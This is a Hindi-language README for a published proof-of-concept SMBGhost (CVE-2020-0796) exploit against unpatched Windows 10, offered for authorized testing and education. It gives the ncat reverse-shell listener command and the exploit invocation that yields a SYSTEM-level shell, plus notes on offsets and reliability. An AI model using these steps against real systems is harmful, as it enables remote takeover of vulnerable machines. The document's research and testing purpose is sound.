
CVE-2020-0796 (SMBGhost) के लिए प्रूफ-ऑफ-कॉन्सेप्ट रिमोट कोड निष्पादन एक्सप्लॉइट जो बिना पैच वाले Windows 10 1903/1909 को लक्षित करता है। SMB प्रोटोकॉल भेद्यता के माध्यम से रिवर्स शेल वितरित करता है। अधिकृत परीक्षण और शिक्षा के लिए अभिप्रेत है।
(c) 2020 ZecOps, Inc. - https://www.zecops.com - हमलावरों की गलतियाँ खोजें
CVE-2020-0796 / "SMBGhost" के लिए रिमोट कोड निष्पादन POC
अपेक्षित परिणाम: सिस्टम एक्सेस के साथ रिवर्स शेल।
केवल शैक्षिक और कॉर्पोरेट वातावरण में परीक्षण के लिए अभिप्रेत है।
ZecOps कोड के लिए कोई ज़िम्मेदारी नहीं लेता है, अपने जोखिम पर उपयोग करें।
यदि आप सर्वर, एंडपॉइंट और मोबाइल डिवाइसों के लिए एजेंट-रहित DFIR टूल्स में रुचि रखते हैं, जो SMBGhost और अन्य प्रकार के हमलों का स्वचालित रूप से पता लगाते हैं, तो कृपया [email protected] से संपर्क करें।
सुनिश्चित करें कि Python और ncat स्थापित हैं।
calc_target_offsets.bat को लक्ष्य कंप्यूटर पर चलाएँ, और स्क्रिप्ट आउटपुट के अनुसार SMBleedingGhost.py फ़ाइल के शीर्ष पर ऑफसेट समायोजित करें (नीचे दिया गया नोट भी देखें)।
ncat को निम्नलिखित कमांड-लाइन तर्कों के साथ चलाएँ:
ncat -lvp <port>
जहाँ <port> वह पोर्ट नंबर है जिस पर ncat सुन रहा होगा।
SMBleedingGhost.py को निम्नलिखित कमांड-लाइन तर्कों के साथ चलाएँ:
SMBleedingGhost.py <target_ip> <reverse_shell_ip> <reverse_shell_port>
जहाँ <target_ip> लक्ष्य, भेद्य कंप्यूटर का IP पता है। <reverse_shell_ip> और <reverse_shell_port> वे IP पता और पोर्ट नंबर हैं जिन पर ncat सुन रहा है।
यदि सब कुछ ठीक रहा, तो ncat एक शेल प्रदर्शित करेगा जो लक्ष्य कंप्यूटर तक सिस्टम पहुँच प्रदान करता है।
नोट: आप सोच रहे होंगे कि लक्ष्य कंप्यूटर पर calc_target_offsets.bat स्क्रिप्ट चलाना क्यों आवश्यक है, और क्या यह रिमोट कोड निष्पादन के दूरस्थ होने के पूरे उद्देश्य को विफल नहीं करता। ये ऑफसेट यादृच्छिक नहीं हैं, और समान Windows संस्करण के सभी Windows इंस्टेंस पर समान हैं। कोई व्यक्ति लक्ष्य Windows संस्करण का पता लगाकर और ऑफसेट को स्वचालित रूप से समायोजित करके, या उन पर बिल्कुल भी निर्भर न रहकर हमले को अधिक सार्वभौमिक बना सकता है, लेकिन यह केवल एक POC है और हमने वही किया जो सरल था। हम इसे एक अच्छी बात के रूप में भी देखते हैं कि POC सार्वभौमिक नहीं है, और परीक्षण और शिक्षा के अलावा अन्य उपयोगों के लिए सुविधाजनक नहीं है।

Windows 10 संस्करण 1903 और 1909 प्रभावित हैं। बिना पैच वाले Windows 10 1903 संस्करण Windows में नल डीरेफरेंस बग के कारण समर्थित नहीं हैं (KB4512941 में ठीक किया गया)।
शोषण की प्रकृति के कारण, POC एकल लॉजिकल प्रोसेसर वाले कंप्यूटर (या VM) पर चलने वाले लक्ष्यों के लिए सबसे अच्छा काम करता है। VirtualBox में चलने वाले एक से अधिक लॉजिकल प्रोसेसर वाले लक्ष्य भी समर्थित होने चाहिए, लेकिन इस मामले में POC कम विश्वसनीय है। अन्य लक्ष्य समर्थित नहीं हो सकते हैं। विवरण के लिए, नीचे हमारा तकनीकी लेख देखें।